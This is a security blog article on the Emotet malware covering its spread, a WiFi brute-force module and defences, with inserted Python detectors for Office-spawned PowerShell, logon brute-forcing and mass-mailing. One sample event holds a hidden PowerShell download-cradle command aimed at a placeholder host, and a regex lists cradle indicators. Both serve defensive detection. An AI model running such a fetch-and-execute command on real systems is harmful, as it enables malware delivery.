A Deep Dive Look at EMOTET Malware

By Edward Serafin III, C|EH, Security Architect

Emotet: What is it?

Emotet is a type of malware that originated in 2014. It was initially a banking trojan that stole information such as credit card details from its victims, and it was delivered through social engineering techniques like malicious spam. Over the years it became more dangerous and destructive. It has now evolved into what the U.S. Department of Homeland Security calls “…the most costly and destructive malware affecting state, local, tribal, and territorial governments, and the private and public sectors”.

Emotet was inactive for some time until earlier this year. It has since transformed into modular malware, which makes it stealthier and more dangerous. One of its stealth mechanisms is polymorphism: its code changes at least three times a day. Emotet can also detect when it is running in a virtual machine or sandbox environment, allowing it to remain dormant and undetected there. To make matters worse, it has gained worm capabilities, allowing it to spread to and infect many devices instead of just one.

It was recently discovered that Emotet now has a WiFi spreader. This is a completely new attack vector that endangers companies located near an infected one: if a nearby organization is infected with Emotet and your WiFi password is not strong, it is likely that you too will be infected by this malware.

How does it work?

The main attack vector remains malicious spam. The infection can arrive as a malicious script, a macro-enabled document, or a malicious link, and Emotet emails are disguised to look like genuine messages. Once a computer is infected, the malware sends itself to the entire contact list found on the device. This makes the email look more legitimate, because it comes from a real, known sender.

Once the document is opened, a batch script is invoked, which in turn launches PowerShell. PowerShell then cycles through a number of URLs of hijacked websites to download the Emotet payload. The payload executes and establishes persistence, then begins spreading by brute-forcing its way onto other systems on the network.
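The batch-to-PowerShell chain just described is one of the most detectable moments of the infection: an Office application should rarely spawn a command interpreter, and almost never one whose command line contains a download cradle or an encoded command. The following is an added example, not code from the original article or from any vendor product. It reconstructs process ancestry from constructed Sysmon-style process-creation events (host names, PIDs, paths and command lines are all sample data, with an `.invalid` domain as placeholder) and flags script hosts that descend from an Office process, rating the finding higher when the command line looks like a download cradle.

```python
import re

# Constructed process-creation events in a Sysmon-style shape (sample data, not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "pid": 4012, "ppid": 3900,
     "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n invoice.docm"},
    {"host": "ws01", "pid": 4100, "ppid": 4012,
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c powershell -w hidden -enc SQBFAFgA..."},
    {"host": "ws01", "pid": 4111, "ppid": 4100,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -w hidden -NoP -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""},
    {"host": "ws02", "pid": 5000, "ppid": 4800,
     "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    {"host": "ws02", "pid": 5010, "ppid": 5000,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\inventory.ps1"},  # benign admin script, not flagged
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments typical of a download cradle or an encoded command (assumed indicator list).
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|-enc\b|-encodedcommand|frombase64string", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(event, by_pid, max_depth=5):
    """Return [event, parent, grandparent, ...] by following ppid within the same host."""
    chain = [event]
    for _ in range(max_depth):
        parent = by_pid.get((chain[-1]["host"], chain[-1]["ppid"]))
        if parent is None:
            break
        chain.append(parent)
    return chain


def find_office_script_chains(events):
    """Flag script hosts that descend from an Office application; rate 'high' when a cradle is present."""
    by_pid = {(e["host"], e["pid"]): e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in SCRIPT_HOSTS:
            continue
        chain = ancestry(e, by_pid)
        if not any(basename(a["image"]) in OFFICE_APPS for a in chain[1:]):
            continue
        findings.append({
            "host": e["host"],
            "pid": e["pid"],
            "chain": " -> ".join(basename(a["image"]) for a in reversed(chain)),
            "severity": "high" if CRADLE.search(e["cmdline"]) else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in find_office_script_chains(SAMPLE_EVENTS):
        print(finding)
```

Both the cmd.exe child of WINWORD.EXE and the PowerShell grandchild are reported, while the PowerShell launched from Explorer on the second host is ignored; the same ancestry walk works unchanged on real Sysmon Event ID 1 data once the field names are mapped.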

The new attack vector recently discovered works like this:
1. Emotet infects a host

2. WiFi Spreader module is downloaded and then run

3. Nearby devices with reachable WiFi networks are discovered

4. A brute-force attack is conducted on each network

5. Once in, another brute-force attack is conducted to discover the usernames and passwords of servers and computers connected to the WiFi network

6. The Emotet infection cycle repeats
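Step 5 above, like the network spreading described earlier, leaves a recognisable trail in authentication logs: a burst of failed logons from one source against several accounts, often followed by a success. The block below is an added example, not the article's or any product's code. It runs a sliding-window brute-force detector over constructed logon records (source addresses, user names and timestamps are sample data) and also raises a separate alert when a success immediately follows a burst of failures, which is the event a responder most needs to see. The window size and thresholds are assumptions to be tuned per environment.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

BASE = datetime(2020, 6, 1, 9, 0, 0)


def _ev(sec, src, user, success):
    """Build one constructed authentication record (sample data)."""
    return {"ts": BASE + timedelta(seconds=sec), "src": src, "user": user, "success": success}


# Constructed logon records: one user typo, then a rapid burst of failures from a single
# host across several accounts followed by a success (the pattern a spreading infection leaves).
SAMPLE_LOGONS = [_ev(5, "10.0.1.7", "alice", False), _ev(9, "10.0.1.7", "alice", True)]
SAMPLE_LOGONS += [_ev(30 + 2 * i, "10.0.1.50", ("admin", "backup", "svc_sql")[i % 3], False)
                  for i in range(12)]
SAMPLE_LOGONS.append(_ev(60, "10.0.1.50", "backup", True))


def detect_bruteforce(events, window=timedelta(minutes=5), max_failures=10, min_accounts=3):
    """Sliding-window count of failed logons per source; also flag a success that follows a burst."""
    alerts = []
    already = set()                         # sources already reported, to avoid alert storms
    recent = defaultdict(deque)             # src -> deque of (ts, user) for failures inside the window
    for e in sorted(events, key=lambda r: r["ts"]):
        q = recent[e["src"]]
        while q and e["ts"] - q[0][0] > window:
            q.popleft()                     # expire failures older than the window
        if not e["success"]:
            q.append((e["ts"], e["user"]))
            accounts = {u for _, u in q}
            if len(q) >= max_failures and len(accounts) >= min_accounts and e["src"] not in already:
                alerts.append({"type": "bruteforce", "src": e["src"], "failures": len(q),
                               "accounts": len(accounts), "at": e["ts"].isoformat()})
                already.add(e["src"])
        elif len(q) >= max_failures // 2:
            # A success right after many failures is the signal that matters most: likely compromise.
            alerts.append({"type": "success_after_failures", "src": e["src"], "user": e["user"],
                           "failures": len(q), "at": e["ts"].isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOGONS):
        print(alert)
```

Requiring several distinct accounts keeps a single user mistyping a password from tripping the rule, while the "success after failures" alert fires regardless of whether the source was already reported, because it marks the point at which containment should begin.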

How can I defend against EMOTET?

Awareness – Awareness is a key component in preventing Emotet from spreading. Informing the employees of your company to avoid spam emails and to not click on any downloads is important. If you do not know the sender, avoid the email. If you did not expect a message with an attachment, do not open it. A security awareness training program is recommended to ensure employees know how to detect malicious emails.

Incident Response – Having a robust incident response plan in case of a device infected by Emotet is important. Below are 9 steps the plan should incorporate:

1. Detection

2. Analysis/Classification – Analyze what was compromised and classify accordingly

3. Containment – Restrict access to the affected system(s). Change passwords if necessary.

4. Pre-recovery – Back up affected systems

5. Communication – Tell the people who need to know 

6. Containment (long-term) – If system(s) must return to production immediately, scan for malware, install security patches, remove any identified invalid accounts or backdoors, and validate with a vulnerability scanner

7. Eradication – Rebuild the system(s) from backups and make sure all malware is gone.

8. Recovery – Restore the affected system(s) to their original state and put them back into production

9. Lessons Learned – Document what was discovered about the incident

A good Security Operations Center (SOC) is needed to implement such an incident response plan. If your company does not have one, a SOC-as-a-service is a good option to look into as it will keep your business safe and secure.

Artificial Intelligence – Traditional security tools are no match for Emotet, but artificial intelligence and machine learning solve this problem. Some cybersecurity software uses unsupervised machine learning algorithms to detect cyber-threats that have already infiltrated the network. It learns the individual pattern of life of every user, device, and network that it protects, so it can determine what is normal and what is anomalous behavior. It is able to detect malicious email spamming and brute-force attacks with ease.

Having an intrusion prevention system that utilizes machine learning and artificial intelligence is perhaps the best security measure, besides awareness, in combating Emotet. 
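The "pattern of life" idea above reduces, at its simplest, to a per-entity baseline with an anomaly threshold. The block below is an added illustration, not the article's or any product's code: it baselines each user's hourly outbound message count from constructed history and flags an hour whose count is far above that user's own normal, which is what the self-mailing behaviour described earlier (an infected mailbox sending to its entire contact list) looks like in mail logs. User names and counts are constructed sample data; the z-score threshold and the absolute floor are assumptions.

```python
import statistics

# Constructed per-user hourly outbound message counts over two weeks of working hours (sample data).
HISTORY = {
    "alice": [3, 5, 4, 6, 2, 5, 4, 3, 5, 4, 6, 3, 4, 5],
    "bob":   [20, 25, 18, 22, 30, 24, 19, 21, 26, 23, 22, 20, 25, 24],
}
# Constructed counts for the hour under review: alice's mailbox has started mass-mailing.
CURRENT_HOUR = {"alice": 57, "bob": 27}


def baseline(counts):
    """Mean and population standard deviation of a user's historical hourly counts."""
    return statistics.mean(counts), statistics.pstdev(counts)


def score(user, count, history, k=4.0, floor=20):
    """z-score the current count against the user's own baseline.

    k is the number of standard deviations that counts as anomalous and floor is an absolute
    minimum so that a very quiet user going from 1 to 5 messages does not page anyone (assumed values).
    """
    mean, sd = baseline(history)
    sd = max(sd, 1.0)                  # guard against a near-zero deviation for very regular users
    z = (count - mean) / sd
    return {"user": user, "count": count, "baseline_mean": round(mean, 2),
            "z": round(z, 2), "anomalous": z >= k and count >= floor}


def find_mail_anomalies(current, history, **thresholds):
    """Return the scored entries that exceed the threshold, users without history are skipped."""
    results = (score(u, c, history[u], **thresholds) for u, c in current.items() if u in history)
    return [r for r in results if r["anomalous"]]


if __name__ == "__main__":
    for anomaly in find_mail_anomalies(CURRENT_HOUR, HISTORY):
        print(anomaly)
```

Bob's 27 messages sit within his noisy but high baseline and are ignored, while alice's 57 is dozens of standard deviations above her quiet normal; the same per-entity comparison is what lets a behavioural tool catch a mailbox that is spamming without any signature for the message content.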

Secure WiFi – With this new attack vector, companies should make their WiFi passwords longer and more complex.

Create backups – This is a simple and effective way to reduce the damage that Emotet can cause. If your company is not taking regular backups, investing in a backup solution provider is ideal. This ensures data is secure, always available, and accurate.

Patch and Secure Machines – Making sure machines are secured and up to date is important in preventing Emotet from infecting them. An out-of-date machine has more vulnerabilities, which increases the risk of infection.

Network Segmentation – This is an uncommon practice, but with the recent blow-up in devastating malware it is becoming more widely used. Splitting a network into subnetworks greatly increases network security and performance. If one subnetwork is infected, only the devices on that subnetwork are affected; devices on the other subnetworks remain safe and secure and can continue their daily tasks.

What Do I Do If My Organization is Infected?

Even with all these ways to defend against Emotet, it is still possible for it to get through. That is the unfortunate nature of cyber security: nothing is 100% protected. All it takes is one click from an employee for Emotet to be downloaded and infect the computer, and that one click can potentially cost your company millions.

If a device is infected, it is important to assess how much damage has been done. With this type of malware, you should assume that if one device is infected, so are others. The following are some steps to follow if possible:

  1. Shut down the entire network.
  2. Remove the malware.
  3. Secure the device.
  4. Restore the network.

Emotet is a deadly, polymorphic virus that is becoming deadlier by the month. The more people know about it, the easier it will be to prevent it. Nothing is ever completely secure, but the best we as humans can do is try to minimize loss by making things as secure as possible. The cyber-security field changes on a daily basis, with new malware being introduced all the time. With the emerging AI technology, the future is looking bright for cyber-security. Emotet may be running rampant now, but as long as you follow the ways to defend against it, you and your company will be safe.  
